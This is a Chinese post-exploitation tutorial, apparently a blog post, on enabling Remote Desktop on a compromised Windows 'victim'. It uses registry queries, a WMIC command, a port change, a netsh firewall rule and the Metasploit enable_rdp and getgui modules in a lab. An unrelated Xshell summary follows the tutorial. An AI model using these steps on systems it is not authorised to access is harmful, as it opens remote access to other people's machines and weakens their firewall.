开启目标远程桌面服务方法总结

一、目的

  获取了victim 的 shell控制权后如果想像管理员使用电脑一样control目标主机则需要确认对方远程登录服务是否开启,如果没有开启需要手动开启。(后渗透阶段)

Tips:
远程桌面默认端口:3389
远程桌面默认服务:termservice

二、CMD之远程桌面服务

2.1 查看远程桌面是否开启

  1. 方法一
    使用net命令,查看服务方式查看远程桌面是否开启:
    在这里插入图片描述

  2. 方法二
    通过注册表值查看是否开启(0x0是开启,0x1是关闭)

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

在这里插入图片描述
在这里插入图片描述

2.2 确认远程端口号是否默认

  远程桌面的默认端口是3389,为了防止管理员更改了远程端口给我们连接带来意想不到的情况,需要通过查看注册表键值确认远程桌面的端口是否为3389

REG QUERY "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

在这里插入图片描述
(0xd3d是16进制的3389)
在这里插入图片描述

2.3 确认远程桌面服务状态

如果端口号是默认3389情况下,此状态开启并正常
在这里插入图片描述

2.4 WMIC开启/关闭远程桌面(推荐)

WMIC简介:不仅可以管理本地计算机而且可以管理同一域内所有远程计算机,拿到system shell权限情况下建议使用此种方式!

(开启服务参数为1,关闭服务参数为0)

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

在这里插入图片描述

Tips: 推荐此种方法,由于此方法会自动开启系统远程桌面中的允许远程连接到此计算机并启动默认的3389端口
在这里插入图片描述
如果是使用的net start termservice 命令则是只能启动服务,不开启端口和上方的系统远程桌面配置(不能进行远程桌面连接!)

2.5 更改远程桌面端口(附)

》》将远程桌面默认端口3389更改成3388

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3388 /f

在这里插入图片描述
》》重启服务
在这里插入图片描述
》》查看端口已经被更改
在这里插入图片描述

2.6 防火墙不过滤3389端口

开启对方远程登录后,进行登录后如果未修改防火墙会报如下错误:
在这里插入图片描述
修改防火墙配置,使得不过滤3389端口

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 

在这里插入图片描述
再次连接成功
在这里插入图片描述

三、MSF开启目标远程桌面

Attacker Kali IP:10.32.22.238
Victim Windows 2008R2 IP:10.32.22.241

3.1 在MSF shell中开启远程桌面(推荐)

如果不是最高权限需要提权!

3.1.1 优 / 缺点

优点: 稳定,可多次启动关闭
缺点: 命令长,不易记住一般复制粘贴

3.1.2 启动远程桌面前 前期工作

》》已拿到了一个system shell(过程略)
在这里插入图片描述
》》进入shell(cmd)
在这里插入图片描述
》》确定远程桌面默认端口号是否改动(未改动)
在这里插入图片描述
》》确认远程桌面是否开启(未开启)
在这里插入图片描述
》》开始进入正文开启远程桌面

3.1.3 MSF shell中使用WMIC启动

》》启动服务

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

在这里插入图片描述
》》确认是否启动成功(或者通过 net start 查看服务)
在这里插入图片描述

3.2 使用MSF enable_rdp模块

3.2.1 优 / 缺点

优点: 命令简单,熟练的话不用复制WMIC繁琐命令
缺点: 只能启用并禁用一次,再次启用无效(Windows 2008R2 和Windows7中都出现这种情况,其它环境下未实验)

3.2.2 Meterpretr enable_rdp模块中启用

》》使用如下模块启用远程桌面

run post/windows/manage/enable_rdp 

(显示如下绿框中RDP被禁用,启用中……说明启用成功)
在这里插入图片描述
》》验证是否开启(已开启)
在这里插入图片描述
》》关闭服务(服务关闭成功)
(文件为启用模块后的给的路径,都在/root/.msf4/loot/目录下)

run multi_console_command -r <FileLocation>

在这里插入图片描述

Tips:
再次启动服务,会起不来,适合用一次
在这里插入图片描述

3.3 使用MSF getgui模块

3.3.1 优 / 缺点

优点: 命令简单
缺点: 只能启用并禁用一次,再次启用无效

3.3.2 Meterpreter getgui模块中启用

启用(关闭在执行后的说明中)
在这里插入图片描述

  • 2
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Xshell是一款用于远程连接的工具,可以在Windows、Mac、Android和iOS等平台上使用。在使用Xshell进行远程连接之前,首先需要下载和安装Xshell软件。在国内,一些下载网址提供的Xshell是收费的,所以我们可以在百度网站上搜索Xshell下载时要注意选择合适的下载网址。 使用Xshell进行远程连接的步骤如下: 1. 下载并安装Xshell软件。 2. 打开Xshell,新建一个会话。 3. 在会话中输入目标主机的IP地址或域名。 4. 输入登录凭据,包括用户名和密码。 5. 连接会话,即可远程连接到目标主机。 在使用Xshell进行远程连接时,可以根据需要设置会话文件夹,以便更好地管理会话。同时,我们还可以通过查看虚拟机的IP地址来确定要连接的目标主机。 总结来说,Xshell是一款方便实用的远程桌面工具,可用于在不同的平台上进行远程连接。通过下载、安装和设置会话,我们可以轻松地进行远程连接操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [[Linux]远程连接(Xshell)](https://blog.csdn.net/m0_53022813/article/details/127531800)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Xshell正版免费--远程连接工具,再也不用找破解版了!](https://blog.csdn.net/qq_56870570/article/details/119026385)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值